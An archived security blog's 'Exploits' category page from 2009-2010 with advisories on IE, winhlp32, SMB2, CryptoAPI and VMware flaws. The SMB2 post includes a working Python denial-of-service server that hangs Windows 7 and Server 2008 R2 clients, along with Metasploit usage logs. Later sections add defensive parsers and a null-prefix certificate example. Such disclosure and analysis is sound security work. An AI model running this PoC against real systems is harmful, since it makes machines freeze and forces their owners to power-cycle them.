Archive for the ‘Exploits’ Category

IE v.6,7,8 RCE && stack overflow in winhlp32 process (Windows XP SP3)

Thursday, February 25th, 2010

Introduction:
This vulnerability concerns invoking winhlp32.exe, the Microsoft Windows Help file viewer, from Internet Explorer 6, 7 and 8 through VBScript. Passing a malicious .HLP file to winhlp32 could allow a remote attacker to run arbitrary commands.
Additionally, there is a stack overflow vulnerability in winhlp32.exe itself.

Proof of Concept:
Triggering the vulnerability needs some user interaction: the victim has to press F1 while the MsgBox popup is displayed, which opens the help file named in the call.

MsgBox(prompt[,buttons][,title][,helpfile,context])

It is possible to pass a remote SMB (Samba) share as the helpfile parameter, so the .HLP file can be served from an attacker-controlled host. In addition there is a stack-based buffer overflow when the helpfile parameter is too long; however, on XP winhlp32.exe is compiled with the /GS flag, which in this case effectively guards the stack, so the code-execution path is the malicious .HLP file rather than the overflow.


Affected Systems:
Windows XP with Service Pack 3

Not Affected Systems:
Vista, Windows 7

Impact:
Value: MEDIUM
The vulnerability allows remote attacker to run arbitrary code on victim machine.

Related sources:
Isec Security Research

Internet Explorer 6-7-8 => Remote Code Execution

Tuesday, January 19th, 2010

Summary:
Microsoft is investigating reports of limited, targeted attacks against customers of Internet Explorer 6, using a vulnerability in Internet Explorer.

Affected:
Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 is not affected. Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2 are vulnerable.

Vulnerability:
The vulnerability exists as an invalid pointer reference within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.
In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site.
An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.

NOTE: This is the vulnerability used by attackers in China to spy on and compromise Gmail accounts (the campaign later dubbed Operation Aurora).

Windows 7 and Windows Server 2008 R2 Remote Kernel Crash Exploit

Monday, November 16th, 2009

Windows 7 and Windows Server 2008 R2 Remote Kernel Crash Exploit
Windows 7 and Windows Server 2008 R2, with the very latest patches applied, are affected by this vulnerability. A link to a server running this code could easily be embedded in a web page or e-mail, pointing to a malicious host on the Internet, so this exploit is not confined to corporate networks doing file sharing. It has been tested on the affected operating systems, fully patched as of 12 Nov 2009.
It affects hosts regardless of which SMB version they are running.
It has no mechanism for propagation, and the vulnerability cannot be used to steal information or compromise system integrity, but it hangs the host (no blue screen; the machine has to be power-cycled), over IPv4 or IPv6.

Exploiting
On a Linux machine, make sure TCP port 445 is reachable (open it in the firewall or take the firewall down) and that the Linux host and the target Windows host have connectivity, then run the script below (python win7-crash.py) as root, since binding a TCP service on port 445 needs it. On the target Windows box, point the SMB client at the Linux box, for example with "net use \\x.x.x.x\BLAH" or by opening \\x.x.x.x\BLAH in Explorer, where x.x.x.x is the IP address of the Linux box.

Proof of Concept (Sploit)

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and Server 2008 R2 (infinite loop).
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
#caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly crashes.
#Author: Laurent Gaffié (http://twitter.com/g_laurent)
#
# Ported to Python 3 for this page (socketserver, bytes literals, print()).
# The bytes sent are unchanged; the literals are wrapped in parentheses so
# they concatenate into one packet instead of being separate statements.

import socketserver

# NetBIOS session header followed by an SMB2 NEGOTIATE response.
packet = (
    b"\x00\x00\x00\x9a"  # ---> length should be 9e not 9a..
    b"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
    b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
    b"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
    b"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
    b"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
    b"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
    b"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
)


class SMB2(socketserver.BaseRequestHandler):
    """Answer whatever the client sends with the malformed NEGOTIATE response."""

    def handle(self):
        print("Who:", self.client_address)
        self.request.recv(1024)      # the client's NEGOTIATE request; content is ignored
        self.request.send(packet)
        self.request.close()


if __name__ == "__main__":
    socketserver.TCPServer.allow_reuse_address = True
    launch = socketserver.TCPServer(("", 445), SMB2)  # listen on all interfaces, port 445
    launch.serve_forever()

#SDL FAILED
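To see what the Windows client actually receives, here is an added dissector for the bytes above. It is my example, not part of the PoC or of the Metasploit module: it walks the NetBIOS session header, the 64-byte SMB2 header and the NEGOTIATE response (field layout per MS-SMB2 sections 2.2.1.2 and 2.2.4), decodes the OIDs in the SPNEGO security buffer, and compares the length the session header declares with the bytes that follow it. The packet bytes are copied from the PoC; the field names and checks are mine.

```python
# Added dissector for the PoC's NEGOTIATE response (not part of the exploit).
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Bytes copied from the PoC above: NetBIOS session header + SMB2 message.
POC_PACKET = (
    b"\x00\x00\x00\x9a"
    b"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
    b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
    b"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
    b"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
    b"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
    b"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
    b"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
)

SMB2_HEADER = struct.Struct("<4sHHIHHIIQIIQ16s")        # MS-SMB2 2.2.1.2: 64 bytes
NEGOTIATE_RESPONSE = struct.Struct("<HHHH16sIIIIQQHHI")  # MS-SMB2 2.2.4: 64 fixed bytes + Buffer
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001


def filetime_to_datetime(filetime):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def decode_oid(raw):
    """DER OBJECT IDENTIFIER contents to dotted form (2b 06 01 05 05 02 -> 1.3.6.1.5.5.2)."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for byte in raw[1:]:
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


def der_oids(buf):
    """Collect every OID in a DER blob by recursing into constructed TLVs (short-form lengths only)."""
    oids, i = [], 0
    while i + 2 <= len(buf):
        tag, length = buf[i], buf[i + 1]
        if length & 0x80:
            raise ValueError("long-form DER length not handled")
        value = buf[i + 2:i + 2 + length]
        if tag == 0x06:
            oids.append(decode_oid(value))
        elif tag & 0x20:                 # constructed: SEQUENCE, [0], [APPLICATION 0], ...
            oids.extend(der_oids(value))
        i += 2 + length
    return oids


def parse_negotiate_response(data):
    """Dissect a NetBIOS-framed SMB2 NEGOTIATE response: the fields a client
    acts on, plus the framing checks a careful client should make first."""
    if len(data) < 4 or data[0] != 0:
        raise ValueError("expected a NetBIOS session message header")
    declared = int.from_bytes(data[1:4], "big")
    body = data[4:]
    if body[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    (_, hdr_size, _credit_charge, status, command, credits, flags, _next_cmd,
     _msg_id, _reserved, _tree_id, _session_id, _signature) = SMB2_HEADER.unpack_from(body, 0)
    if hdr_size != 64 or command != 0:
        raise ValueError("not a NEGOTIATE (command 0) with a 64-byte header")
    (_struct_size, security_mode, dialect, _r1, guid, capabilities, max_transact,
     _max_read, _max_write, system_time, _start_time, sec_off, sec_len,
     _r2) = NEGOTIATE_RESPONSE.unpack_from(body, 64)
    blob = body[sec_off:sec_off + sec_len]
    return {
        "declared_len": declared,
        "actual_len": len(body),
        "length_mismatch": len(body) - declared,      # 0 for a well-formed frame
        "status": status,
        "credits": credits,
        "server_to_redir": bool(flags & SMB2_FLAGS_SERVER_TO_REDIR),
        "dialect": dialect,
        "security_mode": security_mode,
        "server_guid": str(uuid.UUID(bytes_le=guid)),
        "capabilities": capabilities,
        "max_transact": max_transact,
        "system_time": filetime_to_datetime(system_time),
        "blob_fits": sec_off + sec_len == len(body),  # security buffer ends exactly at end of message
        "mech_oids": der_oids(blob),
    }


if __name__ == "__main__":
    for key, value in parse_negotiate_response(POC_PACKET).items():
        print(f"{key:16} {value}")
```

The dissector reports the session header declaring 0x9a (154) bytes while 0x9e (158) follow, the four-byte discrepancy the PoC's own comment points at, and that everything else in the message is self-consistent: SecurityBufferOffset 128 plus length 30 lands exactly at the end of the message, the dialect is 0x0202, and the security buffer is a SPNEGO token (1.3.6.1.5.5.2) offering only NTLMSSP (1.3.6.1.4.1.311.2.2.10). The SystemTime field decodes to early November 2009, consistent with the date given above. A client that checks the declared length against the bytes actually received would reject this frame before acting on it.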

Metasploit Module

#
# Root access is needed to run a service on port 445
#
 
$ sudo msfconsole
 
         =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 441 exploits - 216 auxiliary
+ -- --=[ 190 payloads - 21 encoders - 8 nops
         =[ svn r7470 updated today
 
msf > use auxiliary/dos/windows/smb/smb2_negotiate_response_loop 
msf auxiliary(smb2_negotiate_response_loop) > run
 
[*] Starting the malicious SMB service...
[*] To trigger, the vulnerable client should try to access: \\192.168.0.136\Shared\Anything
[*] Server started.
 
#
# MS09-065 PoC
#
 
$ msfconsole 
 
         =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 441 exploits - 216 auxiliary
+ -- --=[ 190 payloads - 21 encoders - 8 nops
         =[ svn r7470 updated today
 
msf > use auxiliary/dos/windows/browser/ms09_065_eot_integer 
msf auxiliary(ms09_065_eot_integer) > set URIPATH /eot
URIPATH => /eot
msf auxiliary(ms09_065_eot_integer) > run
 
[*] Using URL: http://0.0.0.0:8080/eot
[*]  Local IP: http://192.168.0.136:8080/eot
[*] Server started.
 
(send the target to http://A.B.C.D:8080/eot/)

Patch
There is no patch at the time of writing and no host-based mitigation is available. Do not browse indiscriminately from your workstation, and block outbound SMB (TCP 445 and 139) at the perimeter or disable the SMB client service, so that a workstation cannot be lured into connecting to an attacker's server.

References
FullDisclosure – Seclists
SANS Institute

IE, Chrome, Safari SSL Insecurity

Saturday, October 24th, 2009

IE, Chrome, Safari SSL Insecurity
IE, Chrome and Safari for Windows are not safe browsers for money or confidential transactions such as PayPal; Firefox, which does its own certificate parsing rather than relying on Windows CryptoAPI, is the more secure alternative.

A forged SSL certificate has been published that exploits a gaping hole in a Microsoft library used by all three of those browsers. Although the certificate is fraudulent, it appears to all three to be a completely legitimate credential vouching for the online payment service. At the time of the report the bug had been disclosed more than nine weeks earlier and Microsoft had yet to fix it.
PayPal and thousands of other financial websites use such certificates to generate a digital signature that mathematically proves login pages are not forgeries set up by con artists sitting between the user and the website he is trying to view.
The certificate exploits a security hole in a Microsoft application programming interface known as CryptoAPI, which IE, Google Chrome and Apple Safari for Windows use to parse a website's SSL certificates. Even though the certificate is demonstrably forged, it can be used with the previously released tool sslsniff to make all three browsers display a spoofed page with no warnings, even when its address begins with "https".
The certificate is the latest to target a weakness that causes browsers, e-mail clients and other SSL-enabled applications to ignore all text following a NUL byte (written \0), which marks the end of a string in C-based languages. Attackers exploit it by registering a normal SSL certificate for a domain under their control and placing the name of the site they want to impersonate, followed by the NUL byte, immediately before their own domain in the certificate's Common Name. The CA validates the attacker's domain at the end of the string, while the vulnerable client stops reading at the NUL and sees only the victim's name.

An example of this:

www.paypal.com\0ssl.secureconnection.cc

The take-away from all of this is that if you use IE, Chrome or Safari for Windows to browse the SSL-protected parts of PayPal, there is no way to know whether they are genuine, at least until Microsoft's fix for CryptoAPI is installed. And because it is entirely possible that null-prefix certificates for other sites have been issued more quietly, SSL cannot be relied on at all in those browsers until then.
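As an added illustration (mine, not code from any of the browsers or from CryptoAPI), the following shows the trick in miniature: a C-string view of the Common Name stops at the NUL and compares equal to www.paypal.com, while a length-aware check refuses any name containing a NUL and compares the entire string. The certificate names are constructed from the example above; the wildcard handling follows RFC 2818 and is not something the page discusses.

```python
# Added example, not browser or CryptoAPI code: the null-prefix trick in miniature.

# Constructed: the CN an attacker would request. The CA validates control of the
# domain the full string ends in (secureconnection.cc); a C-string consumer sees PayPal.
FORGED_CN = b"www.paypal.com\x00ssl.secureconnection.cc"
GENUINE_CN = b"www.paypal.com"


def c_string_view(name: bytes) -> str:
    """What strlen()/strcmp()-style code sees: the bytes up to the first NUL."""
    return name.split(b"\x00", 1)[0].decode("latin-1")


def vulnerable_match(cert_name: bytes, host: str) -> bool:
    """The flawed behaviour described above: compare only the C-string view of the CN."""
    return c_string_view(cert_name).lower() == host.lower()


def safe_match(cert_name: bytes, host: str) -> bool:
    """Length-aware matching: reject any NUL or non-ASCII byte, then compare the
    entire name; a leading '*.' matches exactly one leftmost label (RFC 2818)."""
    if b"\x00" in cert_name:
        return False                      # a DNS name can never contain NUL
    try:
        name = cert_name.decode("ascii").lower()
    except UnicodeDecodeError:
        return False
    host = host.lower().rstrip(".")
    if name.startswith("*."):
        labels = host.split(".")
        return len(labels) >= 3 and ".".join(labels[1:]) == name[2:]
    return name == host


def check(cert_name: bytes, host: str) -> dict:
    """Side-by-side result for one certificate name against one host name."""
    return {
        "c_string_sees": c_string_view(cert_name),
        "vulnerable": vulnerable_match(cert_name, host),
        "safe": safe_match(cert_name, host),
    }


if __name__ == "__main__":
    for cn in (GENUINE_CN, FORGED_CN):
        print(cn, check(cn, "www.paypal.com"))
```

The forged name passes vulnerable_match and fails safe_match; the genuine name passes both. The fix is not to strip the NUL and carry on but to reject the certificate outright, since no legitimate CA should ever have issued it.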

References:
Microsoft Security Bulletin
Black Hat Security
TheRegister Security

VMware multiple security issues and advisories

Sunday, October 18th, 2009

VMware multiple security issues and advisories
VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues.

Summary:
Updated DHCP and Kernel packages for ESX 3.5 and ESX 3.0.3 and updated Java JRE packages for ESX 3.5 address several security issues.

Service Console update for DHCP and third party library update for DHCP client.
A stack-based buffer overflow in the script_write_params function of the ISC DHCP client (dhclient) allows a remote or rogue DHCP server to execute arbitrary code on the client via a crafted subnet-mask option.
An insecure temporary-file flaw was discovered in the DHCP daemon's init script (/etc/init.d/dhcpd). A local attacker could use it to overwrite an arbitrary file with the output of the "dhcpd -t" command via a symbolic-link attack, if a system administrator ran the DHCP init script with the "configtest", "restart" or "reload" option.
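Here is an added parser for the DHCP options field (my example, not VMware's or ISC's code) that enforces the fixed sizes RFC 2132 assigns to options such as the subnet mask; the absence of this kind of length check is what lets a crafted subnet-mask option reach a fixed-size buffer in a client. Both option blobs are constructed for this example.

```python
# Added example, not VMware's or ISC's code: DHCP options parser with length checks.
MAGIC_COOKIE = b"\x63\x82\x53\x63"   # RFC 2132: marks the start of the options field

# RFC 2132 options with a fixed length (code -> length in bytes).
FIXED_LEN = {
    1: 4,    # Subnet Mask
    51: 4,   # IP Address Lease Time
    53: 1,   # DHCP Message Type
    54: 4,   # Server Identifier
}


def parse_dhcp_options(blob):
    """Parse a DHCP options field into {code: value}. Raises ValueError on a
    missing cookie, a truncated option, a missing END marker, or a fixed-length
    option whose length byte disagrees with the RFC."""
    if blob[:4] != MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    options, i = {}, 4
    while i < len(blob):
        code = blob[i]
        if code == 255:                      # END
            return options
        if code == 0:                        # PAD
            i += 1
            continue
        if i + 2 > len(blob):
            raise ValueError(f"option {code}: truncated header")
        length = blob[i + 1]
        value = blob[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError(f"option {code}: length {length} runs past end of field")
        expected = FIXED_LEN.get(code)
        if expected is not None and length != expected:
            raise ValueError(f"option {code}: length {length}, expected {expected}")
        options[code] = value
        i += 2 + length
    raise ValueError("options field has no END marker")


def subnet_mask(options):
    """Dotted-quad subnet mask; safe only because parse_dhcp_options fixed its length at 4."""
    return ".".join(str(b) for b in options[1])


def validate(blob):
    """None if the options field is acceptable, otherwise the reason it was rejected."""
    try:
        parse_dhcp_options(blob)
    except ValueError as exc:
        return str(exc)
    return None


# Constructed: a normal DHCPOFFER options field.
BENIGN_OPTIONS = (
    MAGIC_COOKIE
    + bytes([53, 1, 2])                     # message type 2 = DHCPOFFER
    + bytes([1, 4, 255, 255, 255, 0])       # subnet mask 255.255.255.0
    + bytes([54, 4, 192, 168, 0, 1])        # server identifier
    + b"\xff"
)

# Constructed: the same offer with a subnet-mask option claiming 32 bytes, the
# shape of input that overruns a fixed-size buffer in a client that copies the
# value while trusting the length byte.
MALICIOUS_OPTIONS = (
    MAGIC_COOKIE
    + bytes([53, 1, 2])
    + bytes([1, 32]) + b"A" * 32
    + b"\xff"
)

if __name__ == "__main__":
    print("benign   :", validate(BENIGN_OPTIONS), subnet_mask(parse_dhcp_options(BENIGN_OPTIONS)))
    print("malicious:", validate(MALICIOUS_OPTIONS))
```

The benign offer parses and yields 255.255.255.0; the crafted one is rejected at the option-1 length check before any value is copied anywhere, which is the check a client has to make because the length byte is attacker-controlled.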

Updated Service Console package kernel
Service Console package kernel update to version kernel-2.4.21-58.EL.

JRE Security Update
JRE update to version 1.5.0_18, which addresses multiple security issues that existed in earlier releases of JRE.
Notes: These vulnerabilities can be exploited remotely only if the attacker has access to the Service Console network.

References:
The Common Vulnerabilities and Exposures project
VMware Lists